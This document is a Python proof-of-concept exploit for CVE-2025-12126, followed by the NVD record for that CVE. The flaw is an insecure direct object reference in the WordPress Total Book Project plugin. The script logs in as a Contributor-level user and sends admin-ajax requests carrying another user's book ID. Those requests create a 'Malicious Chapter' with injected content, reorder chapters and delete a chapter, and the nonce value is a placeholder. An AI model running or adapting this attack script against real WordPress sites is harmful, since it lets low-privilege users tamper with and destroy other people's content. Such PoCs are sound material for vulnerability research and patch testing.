CVE-2025-12126

# CVE-2025-12126 PoC - WordPress Total Book Project IDOR # Authenticated Contributor+ can manipulate chapters in other users' books import requests import re TARGET_URL = "http://target-wordpress-site.com" ATTACKER_USERNAME = "attacker" ATTACKER_PASSWORD = "attacker_password" TARGET_BOOK_ID = 123 # Victim's book ID (not owned by attacker) def exploit_idor(): """ Exploit IDOR vulnerability in Total Book Project plugin. Steps: 1. Authenticate as Contributor user 2. Identify target book ID belonging to another user 3. Manipulate chapter operations via IDOR """ session = requests.Session() # Step 1: Login as Contributor user login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': ATTACKER_USERNAME, 'pwd': ATTACKER_PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } session.post(login_url, data=login_data) # Step 2: Create chapter in victim's book (IDOR) create_chapter_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" create_data = { 'action': 'total_book_create_chapter', 'book_id': TARGET_BOOK_ID, # IDOR: Using victim's book ID 'chapter_title': 'Malicious Chapter', 'chapter_content': 'Injected content via IDOR', 'nonce': 'attacker_obtained_nonce' # Need valid nonce from page source } response = session.post(create_chapter_url, data=create_data) print(f"Create chapter response: {response.status_code}") # Step 3: Move chapter in victim's book (IDOR) move_chapter_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" move_data = { 'action': 'total_book_move_chapter', 'book_id': TARGET_BOOK_ID, # IDOR vulnerability 'chapter_id': 456, # Chapter to move 'new_position': 1 } response = session.post(move_chapter_url, data=move_data) print(f"Move chapter response: {response.status_code}") # Step 4: Delete chapter in victim's book (IDOR) delete_chapter_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" delete_data = { 'action': 'total_book_delete_chapter', 'book_id': TARGET_BOOK_ID, # IDOR vulnerability 'chapter_id': 789 # Chapter to delete } response = session.post(delete_chapter_url, data=delete_data) print(f"Delete chapter response: {response.status_code}") return True if __name__ == "__main__": exploit_idor()

{"cve": {"id": "CVE-2025-12126", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:46.333", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The The Total Book Project plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.0 via several functions due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform several actions like moving/deleting/creating chapters in books that do not belong to them."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3392629%40the-total-book-project&new=3392629%40the-total-book-project", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/the-total-book-project/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e1b473fd-2444-4a54-b558-4656634a6903?source=cve", "source": "[email protected]"}]}}